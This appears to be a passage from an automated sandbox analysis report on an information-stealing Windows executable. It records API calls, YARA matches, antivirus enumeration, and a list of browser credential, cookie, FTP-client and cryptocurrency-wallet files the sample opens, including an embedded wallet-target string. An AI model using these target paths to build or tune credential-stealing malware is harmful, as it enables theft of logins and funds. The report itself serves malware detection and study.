Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041A440 GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 0_2_0041A440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040FAE0 GetProcessHeap,HeapAlloc,GetUserNameA, 0_2_0040FAE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040FBC0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 0_2_0040FBC0
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: Amcache.hve.13.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: MsMpEng.exe
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 0.3.file.exe.40d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.file.exe.40d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.40a0e67.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.40a0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2762584884.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2761033099.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2206480841.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 5012, type: MEMORYSTR
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: tWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2761033099.0000000000530000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \ElectronCash\wallets\
Source: file.exe, 00000000.00000002.2761033099.000000000052A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.2761033099.0000000000530000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: info.seco
Source: file.exe, 00000000.00000002.2761033099.0000000000530000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe, 00000000.00000002.2761033099.0000000000530000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: MultiDoge
Source: file.exe, 00000000.00000002.2761033099.000000000052A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: seed.seco
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\

Remote Access Functionality

Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 0.3.file.exe.40d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.file.exe.40d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.40a0e67.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.40a0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2762584884.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2761033099.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2206480841.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 5012, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9D0C40 sqlite3_bind_zeroblob, 0_2_6C9D0C40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9D0D60 sqlite3_bind_parameter_name, 0_2_6C9D0D60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8F8EA0 sqlite3_clear_bindings, 0_2_6C8F8EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9D0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 0_2_6C9D0B40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8F6410 bind,WSAGetLastError, 0_2_6C8F6410
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA389592A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError, 23_2_00007FFDA389592A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA38CAEAA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError, 23_2_00007FFDA38CAEAA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDAC0A1F9A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError, 23_2_00007FFDAC0A1F9A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDAC0D290A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError, 23_2_00007FFDAC0D290A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDAC0EB7E8 bind, 23_2_00007FFDAC0EB7E8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDAC0F41DA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError, 23_2_00007FFDAC0F41DA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDAC1215FA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError, 23_2_00007FFDAC1215FA